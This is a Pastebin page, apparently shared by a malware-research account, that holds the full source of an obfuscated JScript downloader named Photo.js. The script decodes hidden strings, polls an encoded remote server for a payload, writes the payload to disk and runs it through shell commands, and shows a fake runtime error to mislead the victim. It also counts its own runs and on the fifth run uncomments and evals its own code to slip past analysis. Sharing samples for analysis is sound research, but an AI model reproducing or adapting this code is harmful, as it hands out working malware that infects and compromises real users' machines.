Advertisement
MalwareBreakdown

Photo.js

Jun 5th, 2017
10,491
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var caedeafdefacdaeab = new ActiveXObject('Scripting.FileSystemObject');
  2.    
  3.     if(caedeafdefacdaeab.FileExists('bfffdebdedceea.txt')){
  4.         caedeafdefacdaeab.DeleteFile(ceaebecfbabc + '/' + 'bfffdebdedceea.txt');
  5.         Wscript.echo('cbeaedaefdccdbcf');
  6.        
  7.         Wscript.echo('cbeaedaefdccdbcf');
  8.        
  9.         Wscript.echo('cbeaedaefdccdbcf');
  10.     }
  11.     if(caedeafdefacdaeab.FileExists('bfffdebdedceeaas.txt'))caedeafdefacdaeab.DeleteFile(ceaebecfbabc + '/' + 'bfffdebdedceeaas.txt');
  12.    
  13.     var ceaebecfbabc = caedeafdefacdaeab.GetSpecialFolder(2);
  14.  
  15.  
  16. /*
  17.  
  18. var bacdfaacecdaea = '';
  19. var eabedaefcefbfdfeff = [];
  20. var acdeeadaafb;
  21.  
  22. function bcdfafcfe(bedefccdeacfbccafab) {
  23.     var ffbcaececdda = bedefccdeacfbccafab.toString();
  24.     var da = '';
  25.     for (var ebffaedbdafcbf = 0; ebffaedbdafcbf < ffbcaececdda.length; ebffaedbdafcbf += 2)
  26.         da += String.fromCharCode(parseInt(ffbcaececdda.substr(ebffaedbdafcbf, 2), 16));
  27.     return da;
  28. }
  29.  
  30. function ccfaabcbab(bdaefffedaff) {
  31.   return !isNaN(parseFloat(bdaefffedaff)) && isFinite(bdaefffedaff);
  32. }
  33.  
  34.  
  35.  
  36. function aaffacfdceaf(fdacdaffdacdaf,ccdacbcdbd){
  37.    
  38.    
  39.     for(i=ccdacbcdbd;i>0;i--){
  40.        
  41.         fdacdaffdacdaf = fdacdaffdacdaf - 1;
  42.        
  43.         if(fdacdaffdacdaf<0)fdacdaffdacdaf = 9;
  44.        
  45.     }
  46.  
  47.     return fdacdaffdacdaf;
  48.    
  49.  
  50. }
  51.  
  52.  
  53.  
  54.  
  55. function bdfebaadddbdfade(sstrstrtfdacdafr,ebbfbddcdb){
  56.    
  57.    
  58.    
  59.     var febdbaabf = sstrstrtfdacdafr.length;
  60.    
  61.     var adafefddcbcaed = '';
  62.    
  63.    
  64.     var ceedeebde = 0;
  65.    
  66.     for(var bdcfebcc=0;bdcfebcc<febdbaabf;bdcfebcc++){
  67.        
  68.         if(ceedeebde>10)ceedeebde=0;
  69.        
  70.        
  71.         if(ccfaabcbab(sstrstrtfdacdafr.charAt(bdcfebcc))){
  72.        
  73.             adafefddcbcaed = adafefddcbcaed + aaffacfdceaf(sstrstrtfdacdafr.charAt(bdcfebcc),ebbfbddcdb[ceedeebde]);
  74.             ceedeebde++;
  75.            
  76.         }else{
  77.            
  78.             adafefddcbcaed = adafefddcbcaed + sstrstrtfdacdafr.charAt(bdcfebcc);
  79.            
  80.         }
  81.        
  82.     }
  83.    
  84.     return adafefddcbcaed;
  85. }
  86.  
  87.  
  88. function baedfaedfadfaf(bddbecddaf,fecdfaaeadefcb){
  89.    
  90.     var efbcfbbbccafbfb = "D6duab_xJNfST(zLh$^ke,1Mj&+KsHU2;0WYcrE7%IOGnt*8FRmX!q5:A-oiPy)QBClwp9v4V@3gZ.";
  91.     var adffafadafeedcaaa = "";
  92.  
  93.     var bcbcddacabdbbad = efbcfbbbccafbfb.length-1;
  94.  
  95.     var size = bddbecddaf.length;
  96.  
  97.    
  98.    
  99.     for(var cafbbfbcc = 0; cafbbfbcc<size ; cafbbfbcc++){
  100.        
  101.         var deafbfabb = efbcfbbbccafbfb.indexOf(bddbecddaf.charAt(cafbbfbcc));
  102.        
  103.         var bdcaddfedb = deafbfabb - fecdfaaeadefcb;
  104.        
  105.         if(bdcaddfedb<0){
  106.            
  107.             bdcaddfedb = bcbcddacabdbbad - Math.abs(bdcaddfedb);
  108.            
  109.             var ccdacbcdbd = bcbcddacabdbbad - 1;  
  110.        
  111.             if(bdcaddfedb==ccdacbcdbd)bdcaddfedb = bdcaddfedb + fecdfaaeadefcb;
  112.            
  113.         }
  114.        
  115.        
  116.         adffafadafeedcaaa = adffafadafeedcaaa + efbcfbbbccafbfb.charAt(bdcaddfedb);
  117.     }
  118.    
  119.     return bcdfafcfe(adffafadafeedcaaa);
  120. }
  121.  
  122.  
  123. var fcaadecabdcce = new ActiveXObject(baedfaedfadfaf("%gdg%;dv%W%Vdvd7d%;7dddvdld:%g%v%g%Vd:d6dRd;d-d:dg%V",1));
  124. var ceaebecfbabc = fcaadecabdcce.GetSpecialFolder(2);
  125.  
  126.  
  127. var fcaadecabdcceDeck = new ActiveXObject(baedfaedfadfaf(':%:gdg%;dv%W%V;7%gdFd:dldl',1));
  128. var dffbdfbd = fcaadecabdcceDeck.SpecialFolders(baedfaedfadfaf('VVd:%gdC%VdR%W',1));
  129. var ceaebecfbabcd = dffbdfbd;
  130.  
  131. var caecddcfdcfeabbe = new ActiveXObject(baedfaedfadfaf("%gdg%;dv%W%Vdvd7d%;7dddvdld:%g%v%g%Vd:d6dRd;d-d:dg%V",1));    
  132.  
  133.  
  134. var aabdffccfafbe = new ActiveXObject(baedfaedfadfaf('V6%g%Fd6dlg;;7:FV6VlVF:V:V:W;7gg;7gW',1));
  135.  
  136.  
  137. var ccfbace = 0;
  138.  
  139. var bfeeedff = 0;
  140.  
  141. var linksssee = ['dF%V%V%Wg-;R;R%gdRd;d;d:%;dvd7dddR;7dgdRd6;Rd%dM%Vd:;7%WdF%W'];
  142.  
  143. while(true){
  144.    
  145.     ccfbace++;
  146.    
  147.     if(linksssee[bfeeedff] == undefined)bfeeedff = 0;
  148.    
  149.    
  150.     try {
  151.    
  152.         aabdffccfafbe.open(baedfaedfadfaf('V%V::V',1,1), baedfaedfadfaf(linksssee[bfeeedff],1)+'?ff'+ccfbace, false);
  153.         aabdffccfafbe.send();
  154.    
  155.  
  156.     } catch(e) {
  157.  
  158.         bfeeedff++;
  159.         WScript.Sleep(1000);
  160.         continue;
  161.  
  162.     }
  163.    
  164.  
  165.     var beeebfdcdfa = aabdffccfafbe.responseText.indexOf('|||');
  166.  
  167.     if( beeebfdcdfa == -1 ){
  168.        
  169.         bfeeedff++;
  170.         WScript.Sleep(1000);
  171.         continue;
  172.        
  173.     }
  174.  
  175.    
  176.     if(aabdffccfafbe.Status == 200)break;
  177. }
  178.  
  179.    var acdcaddaaa = aabdffccfafbe.responseText;
  180.    
  181.     acdcaddaaa = acdcaddaaa.split(baedfaedfadfaf('%l%l%l',1));
  182.  
  183.     var caaeaedecdbadbcbe = acdcaddaaa[0].split(baedfaedfadfaf(';l',1));
  184.    
  185.  
  186.    
  187. bacdfaacecdaea = bdfebaadddbdfade(acdcaddaaa[1],caaeaedecdbadbcbe);
  188.    
  189. var dbccbaafedooo = new ActiveXObject(baedfaedfadfaf("%gdg%;dv%W%Vdvd7d%;7dddvdld:%g%v%g%Vd:d6dRd;d-d:dg%V",1));
  190.    
  191. var  eabedaefcefbfdfeff = [];
  192.  
  193.  
  194.  
  195. for(var bdcfebcc=0; bdcfebcc< bacdfaacecdaea.length-1; bdcfebcc+=2){
  196.     eabedaefcefbfdfeff.push(parseInt(bacdfaacecdaea.substr(bdcfebcc, 2), 16));
  197. }
  198.  
  199. acdeeadaafb = String.fromCharCode.apply(String, eabedaefcefbfdfeff);
  200.  
  201.  
  202. function fbbecbbbeadeadefbba(cefebbceeebac){
  203.  
  204.  
  205. var adffefdccafbbc = cefebbceeebac;
  206. var edfabefbaadbfc = new ActiveXObject(baedfaedfadfaf('VMVVVRVVV;;7:g%V%;d:dMd6',1));
  207. edfabefbaadbfc.Type = 2;
  208. edfabefbaadbfc.Charset = 'ISO-8859-1';
  209. edfabefbaadbfc.Open();
  210. edfabefbaadbfc.WriteText(adffefdccafbbc);
  211. edfabefbaadbfc.SaveToFile(ceaebecfbabcd + '/' +baedfaedfadfaf('gggddVgV;7d:%Fd:',1), 2);
  212. edfabefbaadbfc.Close();
  213.  
  214. }
  215.  
  216.  
  217.  
  218.  
  219.  
  220. fbbecbbbeadeadefbba(acdeeadaafb);
  221.  
  222.  
  223.    var dbccbaafed = new ActiveXObject(baedfaedfadfaf("%gdg%;dv%W%Vdvd7d%;7dddvdld:%g%v%g%Vd:d6dRd;d-d:dg%V",1));
  224.    
  225.  
  226.     var fecfbbdfb = dbccbaafed.FileExists(ceaebecfbabc + '/' +'fbafcfadbceffc.txt');
  227.    
  228.     var ddcfaceddecacec = new ActiveXObject(baedfaedfadfaf(':%:gdg%;dv%W%V;7%gdFd:dldl',1));
  229.            
  230.        
  231.    
  232.  
  233. ddcfaceddecacec.Run(baedfaedfadfaf('dgd6dV;7d:%Fd:;W;Rdg;W',1) + baedfaedfadfaf(';;d:dgdFdR;W:C:-dRd7d::V%;dMd7%gddd:%;:6g7;W',1)+ ceaebecfbabcd +'\\'+ baedfaedfadfaf('gggddVgV;7d:%Fd:',1)+baedfaedfadfaf('g-:-dRd7d:;7VvdVd:d7%Vdvdddvd:%;;;',1),0,false);
  234.  
  235. ddcfaceddecacec.Run(baedfaedfadfaf('dgd6dV;7d:%Fd:;W;Rdg;W',1) + baedfaedfadfaf(';;d:dgdFdR;W:-dRd7d:VvdVg6g;g7g7;W',1)+ ceaebecfbabcd +'\\'+ baedfaedfadfaf('gggddVgV;7d:%Fd:',1)+baedfaedfadfaf('g-:-dRd7d:;7VvdVd:d7%Vdvdddvd:%;;;',1),0,false);
  236.  
  237.    
  238. ddcfaceddecacec.Run(baedfaedfadfaf('dgd6dV;7d:%Fd:;W;Rdg;W',1)+ ceaebecfbabcd +'\\'+ baedfaedfadfaf('gggddVgV;7d:%Fd:',1),0,false);
  239.  
  240.  
  241.    
  242.    
  243.     WScript.echo('Runtime Error 0x48940 (.QBT) Library not located on the system, please use x64 system.');
  244.  
  245.     dbccbaafed.DeleteFile(ceaebecfbabc + '/' +'febdbaabfer.txt');
  246.     if(fecfbbdfb)dbccbaafed.DeleteFile(ceaebecfbabc + '/' +'fbafcfadbceffc.txt');  
  247.    
  248.     WScript.Quit();
  249.    
  250.     */
  251.    
  252.     function ddbecbcaa(eeabfbdbbfa){
  253.        
  254.  
  255.         var daffffceedcdcab = new ActiveXObject('Scripting.FileSystemObject');
  256.        
  257.         var dddfbaadd = eeabfbdbbfa;
  258.        
  259.         var eacdafbaaebdcbad = dddfbaadd;
  260.    
  261.         var aaffdebdacdd = daffffceedcdcab.OpenTextFile(eacdafbaaebdcbad, 1);
  262.        
  263.         var afcdacecfbcffced =  aaffdebdacdd.ReadAll();
  264.                
  265.         aaffdebdacdd.Close();
  266.        
  267.         return afcdacecfbcffced;
  268.        
  269.     }
  270.  
  271.    
  272.    var febdbaabf = 0;
  273.    var fecfbbdfb = caedeafdefacdaeab.FileExists(ceaebecfbabc + '/' + 'febdbaabfer.txt');
  274.    if(fecfbbdfb == true){
  275.     var feceeceaccfad = caedeafdefacdaeab.OpenTextFile(ceaebecfbabc + '/' + 'febdbaabfer.txt', 1,1);
  276.     febdbaabf = feceeceaccfad.ReadAll();
  277.             feceeceaccfad.Close();
  278.    }
  279.     febdbaabf = parseInt(febdbaabf) +1;
  280.    
  281. if(caedeafdefacdaeab.FileExists('bfffdebdedcee3.txt'))caedeafdefacdaeab.DeleteFile(ceaebecfbabc + '/' + 'bfffdebdedcee3.txt');
  282.    
  283.     feceeceaccfad = caedeafdefacdaeab.OpenTextFile(ceaebecfbabc + '/' + 'febdbaabfer.txt', 2,1);
  284.    
  285.     feceeceaccfad.WriteLine(febdbaabf);
  286.     feceeceaccfad.Close();
  287.    
  288.     var cbcffcbafaffeeb = WScript.ScriptFullName;
  289.     var baccafefbfad = ddbecbcaa(cbcffcbafaffeeb);
  290.    
  291.     if(caedeafdefacdaeab.FileExists('bfffdebdedcee.txt'))caedeafdefacdaeab.DeleteFile(ceaebecfbabc + '/' + 'bfffdebdedcee.txt');
  292.    
  293.     if(febdbaabf==4){
  294.        
  295.        
  296.         feceeceaccfad = caedeafdefacdaeab.OpenTextFile(ceaebecfbabc + '/' + 'ebceeadfbaa.txt', 2,1);
  297.        
  298.         if(caedeafdefacdaeab.FileExists('bfffdebdedceea.txt'))caedeafdefacdaeab.DeleteFile(ceaebecfbabc + '/' + 'bfffdebdedceea.txt');
  299.        
  300.         feceeceaccfad.WriteLine(febdbaabf);
  301.         feceeceaccfad.Close();
  302.        
  303.     }
  304.    
  305.     if(febdbaabf==5){
  306.        
  307.         if(caedeafdefacdaeab.FileExists(ceaebecfbabc + '/' + 'defbfeccdfc.jpg'))caedeafdefacdaeab.DeleteFile(ceaebecfbabc + '/' + 'defbfeccdfc.jpg');
  308.         caedeafdefacdaeab.MoveFile(ceaebecfbabc + '/' + 'ebceeadfbaa.txt', ceaebecfbabc + '/' + 'fbafcfadbceffc.txt');
  309.         if(caedeafdefacdaeab.FileExists(ceaebecfbabc + '/' + 'fffefccf.txt'))caedeafdefacdaeab.DeleteFile(ceaebecfbabc + '/' + 'fffefccf.txt');
  310.         if(caedeafdefacdaeab.FileExists(ceaebecfbabc + '/' + 'fffefccf.txt'))caedeafdefacdaeab.DeleteFile(ceaebecfbabc + '/' + 'fffefccf.txt');
  311.         if(caedeafdefacdaeab.FileExists(ceaebecfbabc + '/' + 'fffefccf.txt'))caedeafdefacdaeab.DeleteFile(ceaebecfbabc + '/' + 'fffefccf.txt');
  312.        
  313.         if(caedeafdefacdaeab.FileExists(ceaebecfbabc + '/' + 'fffefccf.txt'))caedeafdefacdaeab.DeleteFile(ceaebecfbabc + '/' + 'fffefccf.txt');
  314.        
  315.  
  316.         if(caedeafdefacdaeab.FileExists('bfffdebdedceea.txt'))caedeafdefacdaeab.DeleteFile(ceaebecfbabc + '/' + 'bfffdebdedceea.txt');
  317.    
  318.         baccafefbfad = baccafefbfad.replace('/*','').replace('*/', '').replace('deaccffbaa', '').replace('deaccffbaa', '').replace('deaccffbaa', '').replace('deaccffbaa', '').replace('deaccffbaa', '');
  319.     }
  320.    
  321.    
  322.  
  323.     var fecfbbdfb = caedeafdefacdaeab.FileExists(ceaebecfbabc + '/' + 'fbafcfadbceffc.txt');
  324.  
  325.      if(fecfbbdfb == true){
  326.        
  327.        eval(baccafefbfad);
  328.        
  329.     }
  330.  
  331.    
  332.     eval(baccafefbfad);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement